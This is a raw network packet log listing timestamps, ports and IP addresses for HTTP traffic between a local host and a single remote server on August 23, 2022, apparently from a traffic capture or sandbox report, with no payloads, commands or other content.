Aug 23, 2022 18:25:29.650212049 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650238991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650274038 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650332928 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650361061 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650393009 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650422096 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650451899 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650481939 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650511026 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650542021 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650572062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650599957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650631905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650660992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650692940 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650722980 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650753021 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650783062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650811911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650842905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650871992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650902033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650930882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650964975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.650995970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651026964 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651060104 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651092052 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651120901 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651149988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651181936 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651212931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651242018 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651273012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651304007 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651339054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651402950 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651436090 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651464939 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651498079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651532888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651565075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651598930 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651628971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651659012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651688099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651717901 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651746988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651774883 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651803970 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651834965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651864052 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651896000 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651927948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651959896 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.651989937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652019978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652050018 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652080059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652107954 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652137995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652165890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652194977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652225971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652265072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652306080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652335882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652369976 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652403116 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652434111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652465105 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652496099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652525902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652556896 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652587891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652618885 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652650118 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652679920 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652709961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652739048 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652766943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652796030 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652825117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652856112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652884960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652914047 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652945042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.652973890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653002977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653032064 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653062105 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653095961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653122902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653153896 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653187037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653220892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653249979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653280973 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653311014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653342009 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653371096 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653402090 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653434992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653481007 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653528929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653573036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653615952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653657913 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653702021 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653743982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653784990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653826952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653868914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653912067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653954029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.653999090 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654041052 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654083014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654128075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654192924 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654222012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654249907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654284000 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654314041 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654341936 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654372931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654403925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654434919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654464006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654494047 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654522896 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654552937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654582977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654616117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654645920 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654673100 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654704094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654732943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654763937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654793024 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654822111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654850960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654881001 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654908895 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.654937983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.660085917 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660217047 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660451889 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660536051 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660545111 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660572052 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660605907 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660641909 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660674095 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660712004 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660744905 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660778999 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660815001 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660851002 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660885096 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660927057 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660953999 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.660990000 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.661034107 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.661072016 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.661123991 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.661134005 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.661184072 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.661214113 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.661715984 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.661750078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.661777020 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.661803961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.661828995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.661853075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.662178040 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.697494030 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697526932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697550058 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697573900 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697597980 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697639942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697643042 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.697658062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697720051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697745085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697772980 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697777987 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.697798014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697818041 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697840929 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697865963 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.697938919 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.698517084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698543072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698565960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698616982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698638916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698772907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698797941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698816061 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.698843956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698888063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698915005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698940992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698968887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.698973894 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.699014902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699039936 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699079037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699103117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699145079 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.699151993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699176073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699196100 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.699198961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699238062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699238062 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.699264050 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699270010 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.699285984 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699299097 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.699309111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699363947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699366093 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.699387074 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699409962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699430943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699454069 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699475050 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699497938 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699528933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699553967 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699578047 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699601889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699651003 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699675083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699697971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699723959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699747086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699769974 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699836969 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699858904 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699882030 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699904919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699928999 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.699940920 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.699953079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.700000048 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.700026989 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.700134993 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.735774040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.735841036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.735876083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.735905886 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.735929966 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.735937119 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.735970020 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.735997915 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.736033916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.736037970 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.736063004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.736088991 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.736098051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.736129045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.736134052 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.736157894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.736159086 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.736188889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.736208916 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.736217976 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.736242056 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.736361027 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.737121105 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737168074 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737637997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737742901 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737771034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737797022 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737819910 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737844944 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737876892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737900972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737921953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737945080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737973928 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.737997055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738051891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738075972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738100052 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738122940 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738143921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738162041 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738183975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738208055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738229990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738321066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738367081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738390923 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738414049 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738439083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738441944 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.738462925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738487005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738511086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738535881 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738555908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738576889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738599062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738619089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738640070 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738652945 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.738661051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738686085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738709927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738730907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738749027 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.738754988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738787889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738827944 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.738850117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738874912 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.738877058 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738898993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738909006 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.738923073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738945007 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738951921 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.738974094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.738990068 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.739010096 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.739017010 CEST	49943	80	192.168.2.3	88.198.122.116
